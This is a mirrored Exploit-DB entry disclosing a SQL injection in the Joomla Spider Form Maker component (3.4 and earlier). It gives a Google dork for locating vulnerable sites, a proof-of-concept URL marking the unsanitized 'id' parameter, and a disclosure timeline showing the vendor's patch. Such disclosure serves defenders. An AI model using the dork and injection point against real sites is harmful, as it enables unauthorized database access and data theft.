bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/34637.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

52 lines
No EOL
1.1 KiB
Text
Raw Blame History

######################
# Exploit Title : Joomla Spider Form Maker <= 3.4 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://web-dorado.com/products/joomla-form.html
# Dork Google: inurl:com_formmaker
# Date : 2014-09-07
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://localhost/index.php?option=com_formmaker&view=formmaker&id=[SQLi]
"id" variable is not sanitized.
######################
# Vulnerability Disclosure Timeline:
2014-09-07: Discovered vulnerability
2014-09-09: Vendor Notification
2014-09-10: Vendor Response/Feedback
2014-09-10: Vendor Fix/Patch
2014-09-10: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
Reference in a new issue View git blame Copy permalink